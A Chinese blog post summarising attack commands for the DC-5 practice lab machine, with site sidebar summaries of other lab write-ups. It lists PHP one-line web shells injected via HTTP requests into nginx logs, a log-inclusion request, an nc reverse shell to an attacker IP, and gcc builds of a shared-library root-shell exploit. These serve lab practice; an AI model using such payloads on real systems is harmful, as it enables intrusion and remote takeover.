DC-5靶机渗透简命令汇总

最新推荐文章于 2024-09-27 10:11:28 发布
最新推荐文章于 2024-09-27 10:11:28 发布
阅读量132 收藏
点赞数
分类专栏: 网络安全靶机渗透 文章标签: python 系统安全 web安全 安全架构 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/z2560088/article/details/120558671
版权

在url中植入一句话木马,可执行外部命令,并显示原始输出<?php passthru($_GET['abc']); ?>

[GET /thankyou.php?<?php eval($_REQUEST[123]); ?> HTTP/1.1]

【GET /thankyou.php?file=/var/log/nginx/error.log HTTP/1.1】

[nc -e /bin/bash 192.168.160.129 1234]

nc -lvvp 123

gcc -fPIC -shared -ldl -o libhax.so  libhax.c

gcc -o rootshell rootshell.c

set ff=unix

Zhao蔫儿
关注
专栏目录
DC-5 渗透测试
Darklord.W
04-14 1926
DC-5渗透测试 0x00实验环境 靶机DC-5,IP地址:192.168.8.138 测试机:Kali,IP地址:192.168.8.140; 0x01实验流程 信息收集——主机发现、端口扫描 渗透测试 0x02实验步骤 主机发现 端口及服务扫描 访问web 扫描web目录 然而没有什么有价值信息 继续浏览得到 但是我们发现这里contact页面的年份...
DC-5 靶机渗透
Rex_Surprise的博客
05-10 284
DC-5 靶机渗透 1.渗透过程 THEEND! DC-5 靶机渗透1.渗透过程 开始,扫描主机: netdiscover -r 192.168.0.1/24 找到一个 192.168.0.149 00:0c:29:cb:31:5f 1 60 VMware, Inc. 扫端口: nmap -sS -A -p- ...
DC5靶机渗透测试
Huangshanyoumu的博客
04-17 433
文章目录环境版本:一、信息收集1.主机发现2.端口扫描二、漏洞发现1.访问靶机 web 服务2.尝试利用文件包含漏洞3.尝试将恶意文件写入日志4.利用文件包含访问日志并进行利用三、提权1.查看可以 root 权限使用的命令2.漏洞搜索3.查找 exp,并查看内容4.使用 ftp 进行传输文件 环境版本: VMware pro 16 Kali 2021.1(虚拟机) DC-5(虚拟机) 一、信息收集 1.主机发现 arp-scan -l 2.端口扫描 nmap -A -p- 192.168.2.186
渗透DC-5-文件包含
告白的博客
08-13 314
0x00 环境介绍 本次研究DC系列dc-5渗透提权过程 靶机下载:https://www.vulnhub.com/entry/dc-5,314/ 0x01 信息收集 1)IP收集----192.168.213.153 arp-scan -l 2)端口扫描----80/tcp open http nginx 1.6.2 nmap -A -p- 192.168.213.153 3)目录爆破,使用dirbuster,调用kali自带的字典, 字典位置:usr/share/wordlists/d
ARM汇编伪指令介绍
龙之吻的专栏
09-23 1350
在 ARM 汇编语言程序里,有一些特殊指令助记符,这些助记符与指令系统的助记符不同,没有相对应的操作码,通常称这些特殊指令助记符为伪指令,他们所完成的操作称为伪操作。伪指令在源程序中的作用是为完成汇编程序作各种准备工作的,这些伪指令仅在汇编过程中起作用,一旦汇编结束,伪指令的使命就完成。          在 ARM 的汇编程序中,有如下几种伪指令:符号定义伪指令、数据定义伪指令、汇编控制伪指令、
[网络安全学习篇76]:渗透测试实战-DC-8-靶机入侵
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
05-27 1359
引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足;对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以我就想到了通过写博客(课程笔记)的形式去学习它,虽然写博客会让我多花几倍的时间去学习它,但是当我完成一篇博客所获得的成就感和你们对于我的认同感,让我很满足,能够鼓励我一天天的坚持下去,也希望和我一起学习本期视频的"同道"们也能给一直坚持下去。我们大家一起加油。由于作者本身也是网络信息安全小白,大部分知识点都是初
[网络安全学习篇71]:渗透测试实战-DC-3-靶机入侵
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
05-22 2295
搭建靶机环境 获取其IP地址 Nmap 指纹识别 joomscan扫描 查找网站模板joomla 3.7.0存在的漏洞 sqlmap 列出数据库库名 列出当前数据库的库名 列出joomladb 数据库的库名 列出users 表的字段及类型 列出账密 解密 进入后台 上传木马 反弹shell 提权
[网络安全学习篇69]:渗透测试实战-DC-1-靶机入侵
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
05-20 4633
引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足;对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以我就想到了通过写博客(课程笔记)的形式去学习它,虽然写博客会让我多花几倍的时间去学习它,但是当我完成一篇博客所获得的成就感和你们对于我的认同感,让我很满足,能够鼓励我一天天的坚持下去,也希望和我一起学习本期视频的"同道"们也能给一直坚持下去。我们大家一起加油。由于作者本身也是网络信息安全小白,大部分知识点都是初
vulnhub-DC系列通关记DC3靶机渗透
qq_35258210的博客
02-15 564
声明:此文章仅供参考学习,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。 目录 明确目标 信息收集 whatweb指纹识别工具 dirb目录扫描工具 joomscan(joomla框架专门的漏洞扫描器) searchsploit Ndya搜索工具 渗透攻击 sqlmap使用 john密码爆破工具 后渗透 提权&flag ----nc瑞士军刀工具 靶机汇总:https://blog.csdn.net/qq_35258210/article/d
vulnhub-DC系列通关记DC1靶机渗透
qq_35258210的博客
02-07 1677
目录 flag1 信息收集 漏洞利用 后渗透 flag2 flag3 flag4 最终flag 该流程图出于:https://blog.csdn.net/weixin_44288604/article/details/108027062 本次学习参考于b站千峰机构的网络安全视频:https://www.bilibili.com/video/BV1i7411G7vm?p=268 这张流程图做得很好借来用用。如有侵权请告知删除 flag1 首先我们在启动DC1靶机后进入到系统只显示
渗透测试环境靶机汇总
qq_35258210的博客
01-11 2230
链接来源于网络,如有侵权请告知删除。 phpstudy:https://www.xp.cn/ pikachu:https://github.com/zhuifengshaonianhanlu/pikachu sqli-labs:https://github.com/Audi-1/sqli-labs xss-laba:https://github.com/do0dl3/xss-labs 待续。。。 ...
Challenge 5 - OSCP B
羽的博客
03-14 1023
jdwp可以执行命令,但是这个脚本需要python2来运行,靶机上没有,那么我们只能将8000端口代理出来了,我这里代理到我本地的7800端口上。访问8080端口显 hostname,我们通过nmap可以看到hostname为ms01.oscp.exam,修改/etc/hosts。试了下impacket-smbexec没有成功, 不过他开放了22端口,我们可以ssh登录web_svc用户。得到下面的结果,root用户运行了一个貌似是debug的进程。nmap扫描发现了一个可以的端口8021。
OSCP-Challenge 1 - Medtech
羽的博客
03-14 3788
122靶机进入/home/mario/.ssh目录下,发现存在id_rsa,用这个逐个登录内网靶机,发现14的成功进入。现在我们通过代理可以扫描内网的其他机器了,扫了下10-14、83、83开放的端口基本差不多,发现都有5985。如果可以看到的话,那就单了,直接覆盖成shell文件就可以了,然后等待反弹。登录后发现限制了命令的执行,但是help了一下,发现了哪些可以用的命令。咨询了一下是dns的问题,修改dns的ip位域的ip,也就是10的ip。接着上mimikatz来获取一些明文信息,但是失败了。
单题101. 对称二叉树 (python)20240922
Sep21m_wyy的博客
09-22 386
【代码】单题101. 对称二叉树 (python)20240922。
第二百五十四节 JPA教程 - JPA 多对多映射示例
最新发布
2301_78772942的博客
09-27 452
第二百五十四节 JPA教程 - JPA 多对多映射示例
python 实现harmonic series调和级数算法
luthane的博客
09-24 880
Hn∑k1n1kHn​k1∑n​k1​其中,𝑛n 是正整数。这个级数是由调和数列(Harmonic sequence)的各元素相加所得的和。调和级数的名字源于泛音及泛音列,即一条振动的弦的泛音的波长依次是基本波长的12131421​31​41​等。调和级数的性质发散性:调和级数是一个发散的无穷级数,也就是说,它的部分和随着项数的增加而无限增长。
ubuntu安装libtorch
meng_152634的博客
09-25 693
nouveau是由第三方为NVIDIA显卡开发的一个开源3D驱动,ubuntu默认集成了nouveau驱动,安装NVIDIA驱动前必须禁用系统自带的显卡驱动nouveau,否则安装NVIDIA驱动时会报错。,一定要确定好安装的CUDA版本是否支持显卡的算力,否则安装成功也无法使用GPU加速。如果cmake版本低于3.18,会出现下面的报错,这是由于低于3.18的cmake不支持CUDA17的编译,需要更新cmake版本。因为安装的CUDA版本为12.1,这里选择最新版的CUDNN 9.4.0进行安装。
Python 类class的用法详解
十七次方
09-22 809
Python 中,使用 class 关键字来定义一个类。类定义通常包括类变量、实例变量和方法。
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值